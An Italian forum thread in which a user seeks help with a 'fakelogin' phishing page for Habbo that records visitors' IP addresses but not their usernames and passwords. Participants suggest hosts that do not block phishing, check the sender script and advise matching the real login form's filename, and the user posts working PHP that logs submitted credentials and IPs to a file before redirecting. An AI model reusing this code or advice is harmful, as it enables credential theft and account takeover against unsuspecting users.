• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Problema risolto Domanda Sui FakeLogin

RobbyForzaNapoli

Utente Normale
Autore del topic
1 Aprile 2008
59
44
Miglior risposta
0
Raga xkè una volta finito il fakelogin ho messo tutto....... qnd la gente entra mi arriva kosi:

Nome Indirizzo: [] Passworld: [] IP: [qui esce l'IP]

a me esce sl l'inidirizzo IP e invece la pass e l'indirizzo(msn) nn mi arriva km mai???

:help

anche a me succedeva.. non mi ricordo ma alla fine lo risolto.. prova a levare il fake e riostare tutto!

fammi sapere..

esce sempre :S

cry

probabilemente verrà abe o qualkunaltro spero nn clou xD e ci aiuterà

usi helloweb per caso?

alcuni host bloccano i tentativi di phishing

prova cambiando host ( meglio altervista ) e se il problema persiste vedi se ci sono problemi nel codice del sender

a me veniva su helloweb.. pero poi lo fatto andare.. se mi ricordassi....

ma xk non clau scs?

lo so che abe.. e abe.. pero clau anche lui e bravo

km clou puo vnire stavo skerzando xkè lui nn manka mai ad ogni mia diskussione kmq io h usato altervista ho provato a levare e poi rimettere i file index ma nnt :S

hai provato a upparli in altervista e niente?

cambia send

forse so qual'è il problema... prova a postare tutto... so mettertelo apposto... anke a me era successo...

o usi quello tramite mail o quello tramite log

uno dei due

ok posto ekko qua!

<?php
#Habbo FakeLogin V2 by Robby
#villaNSC@hotmail.it
$habbo = $_POST['habbo'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$f = fopen("reading.html", "a");
fwrite ($f, 'Nome Habbo: <b>['.$habbo.']</b> Password: <b>['.$password.']</b> IP: <b>['.$ip.']<b/><br>');
fclose($f);
header("Location: successfull.html");
?>

Probabilmente il form è inviato con method="get" mentre stai recuperando le variabili dai posts. Ma perchè sto dando informazioni ai lamerozzi? Mah..

ù.ù capper non fare il saputello O.O cmq... Robby scusa se ti rispondo adesso... cmq... il fake login è per habbo? xk se è così... in teoria dovrebbe andare... il file *.php sembra corretto da quello che hai scritto... se invece non funziona lo stesso... prova a cercare nell'html della pagina di habbo ".php" ti troverà il nome del file che viene aperto durante il login... se non corrisponde con il nome del tuo send.php... cambialo... se non funzia neanke così o se non è un fake di habbo... dimmi... che so come risolverlo... ;) spero di esserti stato d'aiuto... :emoji_slight_smile:

RobbyForzaNapoli AMMONITO per 2 messaggi di fila.Il 3° non è da infrazionare in quanto postato in giorni diversi!Cancello il 2° di fila!